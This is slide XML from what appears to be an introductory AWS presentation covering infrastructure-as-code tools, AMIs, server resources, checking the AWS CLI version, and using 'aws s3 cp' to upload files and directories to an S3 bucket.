          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-463550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manual</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automatic ( </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Programmatically</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IaC ( </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as Code ) Tools</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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0" name="Shape 2500"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2501" name="Google Shape;2501;p409"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="5696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chemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AMI</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2502" name="Google Shape;2502;p409"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375625" y="1572925"/>
            <a:ext cx="8456700" cy="2881200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amazon Machine Image</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> (AMI) </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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410"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="5696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chemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What are server resources?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2508" name="Google Shape;2508;p410"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375625" y="1572925"/>
            <a:ext cx="8456700" cy="2881200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-438150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RAM ( Primary Storage )</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-438150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-438150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HDD/SSD/NVME </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( Secondary Storage )</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-438150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Bandwidth</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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411"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="11030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200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>What is AWS CLI?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2514" name="Google Shape;2514;p411"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="343650" y="1894200"/>
            <a:ext cx="8456700" cy="13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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amazon Web Services Command Line Interface</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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p412"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="11030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200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to check if the aws cli is installed in your machine ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2520" name="Google Shape;2520;p412"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664100" y="2395750"/>
            <a:ext cx="5815800" cy="135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500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c:/&gt;   aws - - version</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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pic>
        <p:nvPicPr>
          <p:cNvPr id="2525" name="Google Shape;2525;p413"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="14811" l="12153" r="11171" t="28198"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="283125" y="933062"/>
            <a:ext cx="8577748" cy="2144676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2526" name="Google Shape;2526;p413"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7016126" y="211800"/>
            <a:ext cx="1934975" cy="551575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2527" name="Google Shape;2527;p413"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885450" y="3077750"/>
            <a:ext cx="7777800" cy="969600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5200">
                <a:solidFill>
                  <a:srgbClr val="8C3123"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Simple Storage Service</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5200">
              <a:solidFill>
                <a:srgbClr val="8C312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63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="565800"/>
            <a:ext cx="9144000" cy="4577708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="337" name="Google Shape;337;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9995" l="18834" r="15767" t="8802"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="111425" y="3554850"/>
            <a:ext cx="1279425" cy="1588650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2532" name="Google Shape;2532;p414"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="40975" y="2761650"/>
            <a:ext cx="6604959" cy="2036525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2533" name="Google Shape;2533;p414"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="16670" l="29673" r="28767" t="12028"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6303863" y="520625"/>
            <a:ext cx="2162550" cy="1912550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2534" name="Google Shape;2534;p414"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2693" l="8707" r="64091" t="18086"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677587" y="520613"/>
            <a:ext cx="1485474" cy="2036526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2535" name="Google Shape;2535;p414"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5620" l="46549" r="7253" t="4741"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6645925" y="2761650"/>
            <a:ext cx="2498074" cy="1990125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2536" name="Google Shape;2536;p414"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6746663" y="4545600"/>
            <a:ext cx="2218500" cy="30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EF071B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NVME Gen 5 SSD</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="EF071B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2537" name="Google Shape;2537;p414"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="2533" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2432363" y="1476900"/>
            <a:ext cx="3871500" cy="18900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="D63200"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxn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1" name="Shape 2541"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2542" name="Google Shape;2542;p415"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="6645" r="6033" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1250615"/>
            <a:ext cx="9144000" cy="3892885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2543" name="Google Shape;2543;p415"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254425" y="280600"/>
            <a:ext cx="6480300" cy="7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NVMEs Generation 5 SSD</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>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41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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to upload single file using aws cli on s3 ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2549" name="Google Shape;2549;p4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50">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2250">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aws s3 cp &lt;filename&gt; s3://&lt;bucket-name&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2250">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2250">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2250">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aws s3 cp anil.txt s3://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>oklabsbucket</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2750">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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3" name="Shape 2553"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2554" name="Google Shape;2554;p417"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="76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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to upload multiple files and directory using aws cli on s3 ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2555" name="Google Shape;2555;p417"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3705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2250">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2250">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aws s3 cp &lt;dirname&gt; s3://&lt;bucket-name&gt; - -recursive</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2250">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2250">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
